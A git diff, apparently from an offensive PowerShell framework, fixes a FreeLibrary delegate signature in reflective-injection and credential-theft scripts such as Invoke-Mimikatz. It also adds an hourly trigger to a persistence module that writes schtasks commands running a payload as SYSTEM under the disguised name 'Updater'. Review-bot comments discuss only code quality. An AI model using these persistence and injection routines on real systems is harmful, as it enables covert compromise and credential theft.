-rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection.ps1 | 2 | ||||
-rw-r--r-- | Exfiltration/Invoke-CredentialInjection.ps1 | 2 | ||||
-rw-r--r-- | Exfiltration/Invoke-Mimikatz.ps1 | 2 | ||||
-rw-r--r-- | Exfiltration/Invoke-NinjaCopy.ps1 | 2 | ||||
-rw-r--r-- | Persistence/Persistence.psm1 | 40 |
5 files changed, 44 insertions, 4 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1
index 990c4b1..42900fb 100644
--- a/CodeExecution/Invoke-ReflectivePEInjection.ps1
+++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1
@@ -648,7 +648,7 @@ $RemoteScriptBlock = {
 $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
 $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
- $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
+ $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
 $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
diff --git a/Exfiltration/Invoke-CredentialInjection.ps1 b/Exfiltration/Invoke-CredentialInjection.ps1
index a7b312d..d6f3c4c 100644
--- a/Exfiltration/Invoke-CredentialInjection.ps1
+++ b/Exfiltration/Invoke-CredentialInjection.ps1
@@ -771,7 +771,7 @@ function Invoke-CredentialInjection
 $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
 $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
- $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
+ $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
 $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1
index c701f63..f95daa3 100644
--- a/Exfiltration/Invoke-Mimikatz.ps1
+++ b/Exfiltration/Invoke-Mimikatz.ps1
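Review bot: The corrected `Get-DelegateType @([IntPtr]) ([Bool])` line still carries no comment saying which argument is the parameter-type array and which is the return type, which is exactly the mix-up the removed line shows; a one-line comment such as `# BOOL FreeLibrary(HMODULE hModule): parameter types first, return type second` would keep it from regressing. The identical line is copied verbatim into the Invoke-CredentialInjection hunk on this line and into the Invoke-Mimikatz and Invoke-NinjaCopy hunks on the next line, so the one-character fix had to be applied four times; a single shared Win32 delegate shim dot-sourced by all four scripts would make the next signature fix land once. The enclosing `$RemoteScriptBlock` script block starts and ends outside the hunk.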
@@ -540,7 +540,7 @@ $RemoteScriptBlock = {
 $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
 $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
- $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
+ $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
 $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1
index 15bee1b..f22d5f5 100644
--- a/Exfiltration/Invoke-NinjaCopy.ps1
+++ b/Exfiltration/Invoke-NinjaCopy.ps1
@@ -572,7 +572,7 @@ $RemoteScriptBlock = {
 $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
 $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
- $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
+ $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
 $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1
index b27b981..0861af6 100644
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption
 Starts the payload daily.
+.PARAMETER Hourly
+
+ Starts the payload hourly.
+
 .PARAMETER At
 Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
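Review bot: The new `.PARAMETER Hourly` help in the Persistence.psm1 `@@ -55` hunk says only `Starts the payload hourly.`, but the `$Hourly` switch is declared solely in the `ScheduledTaskHourly` parameter set (see the `@@ -97` hunk on the next line), so it binds only together with -ScheduledTask and fails parameter-set resolution with the other methods such as -PermanentWMI; the help should state that, e.g. `Starts the payload hourly. Only valid with -ScheduledTask.` The same wording is added to New-UserPersistenceOption in the `@@ -214` hunk and should carry the same restriction. The comment-based help block these lines belong to starts outside the hunk.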
@@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption
 $PermanentWMI,
 [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
 [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
 [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
 [Switch]
@@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption
 [Switch]
 $Daily,
+ [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
+ [Switch]
+ $Hourly,
+
 [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
 [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
 [DateTime]
@@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption
 $PersistenceOptionsTable['Time'] = $At
 }
+ 'ScheduledTaskHourly'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'Hourly'
+ }
+
 'Registry'
 {
 $PersistenceOptionsTable['Method'] = 'Registry'
@@ -214,6 +229,10 @@ function New-UserPersistenceOption
 Starts the payload daily.
+.PARAMETER Hourly
+
+ Starts the payload hourly.
+
 .PARAMETER At
 Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@@ -233,6 +252,7 @@ function New-UserPersistenceOption
 [CmdletBinding()]
 Param (
 [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
 [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
 [Switch]
 $ScheduledTask,
@@ -245,6 +265,10 @@ function New-UserPersistenceOption
 [Switch]
 $Daily,
+ [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
+ [Switch]
+ $Hourly,
+
 [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
 [DateTime]
 $At,
@@ -285,6 +309,12 @@ function New-UserPersistenceOption
 $PersistenceOptionsTable['Time'] = $At
 }
+ 'ScheduledTaskHourly'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'Hourly'
+ }
+
 'Registry'
 {
 $PersistenceOptionsTable['Method'] = 'Registry'
@@ -574,6 +604,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
 $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
 }
+ 'Hourly'
+ {
+ $ElevatedTrigger = "schtasks /Create /RU system /SC HOURLY /TN Updater /TR "
+ }
+
 'OnIdle'
 {
 $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "
@@ -617,6 +652,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
 $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
 }
+ 'Hourly'
+ {
+ $UserTrigger = "schtasks /Create /SC HOURLY /TN Updater /TR "
+ }
+
 'OnIdle'
 {
 $UserTrigger = "schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR " |
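Review bot: The new `'Hourly'` arm in the elevated trigger switch (`@@ -574`) is repeated almost verbatim in the user trigger switch (`@@ -617`), the only difference being the `/RU system` prefix, so with the two option-builder arms above every new trigger now has to be added in four places that nothing keeps in sync. A comment on each new arm, `# keep in sync with the user-level 'Hourly' arm below` and `# keep in sync with the elevated 'Hourly' arm above`, would at least make the coupling visible; a single trigger-builder that takes the `/RU` prefix as a parameter would remove it. Unlike the `'Daily'` arm, the hourly one passes no `/ST`, so the first run time is whatever schtasks defaults to when the task is created — presumably the creation time, which the `.PARAMETER Hourly` help should mention. The enclosing function starts and ends outside the hunk, and the trailing `|` on the last line looks like table residue from the page rather than code.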